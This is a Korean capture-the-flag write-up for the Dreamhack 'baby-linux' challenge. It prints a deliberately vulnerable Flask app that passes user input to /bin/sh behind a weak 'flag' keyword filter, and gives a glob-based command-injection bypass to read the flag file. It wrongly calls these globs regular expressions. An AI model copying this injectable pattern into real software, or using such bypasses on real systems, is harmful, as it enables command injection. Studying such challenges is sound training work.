[Dreamhack] baby-linux 드림핵 워게임 문제 풀이

🤱 baby-linux 드림핵 워게임 문제 풀이

1.  문제 설명 확인 후 서버 생성

2.  생성한 서버로 접속  -->  ls 명령어를 입력하여 현존하는 파일 목록 출력

3.  cat 명령어를 통해 requirements.txt 파일 오픈  -->  별다른 힌트를 발견하지 못함

 

4. cat 명령어를 통해 hint.txt 파일 오픈  -->  FLAG의 경로 발견

 

5.  다시 cat 명령어를 이용해 hello 파일에 접근 시도  -->  No! 문자열과 함께 접근 거부

echo $(cat ./dream/hack/hello/flag.txt)

6.  app.py 파일을 열어 소스코드 확인

7.  app.py 코드 확인  -->  Line 13에서 'flag' 용어 필터링 요소 발견

#!/usr/bin/env python3
import subprocess
from flask import Flask, request, render_template

APP = Flask(__name__)

@APP.route('/', methods=['GET', 'POST'])
def index():
ㅤㅤif request.method == 'POST':
ㅤㅤㅤㅤuser_input = request.form.get('user_input')
ㅤㅤㅤㅤcmd = f'echo $({user_input})'

ㅤㅤㅤㅤif 'flag' in cmd:
ㅤㅤㅤㅤㅤㅤreturn render_template('index.html', result='No!')

ㅤㅤㅤㅤtry:
ㅤㅤㅤㅤㅤㅤoutput = subprocess.check_output(['/bin/sh', '-c', cmd], timeout=5)
ㅤㅤㅤㅤㅤㅤreturn render_template('index.html', result=output.decode('utf-8'))
ㅤㅤㅤㅤexcept subprocess.TimeoutExpired:
ㅤㅤㅤㅤㅤㅤreturn render_template('index.html', result='Timeout')
ㅤㅤㅤㅤexcept subprocess.CalledProcessError:
ㅤㅤㅤㅤㅤㅤreturn render_template('index.html', result='Error')

ㅤㅤreturn render_template('index.html')

if __name__ == '__main__':
ㅤㅤAPP.run(host='0.0.0.0', port=8000)

8.  필터링 우회를 위한 정규표현식 작성

# 사용 가능한 정규식
: cat ./dream/hack/hello/f*ag.txt
: cat ./dream/hack/hello/fl*g.txt

 

++  정규표현식 작성 및 검토 사이트

-->  https://regexr.com/

RegExr: Learn, Build, & Test RegEx

9.  다시 문제로 돌아와 작성한 정규표현식 입력  -->  FLAG 발견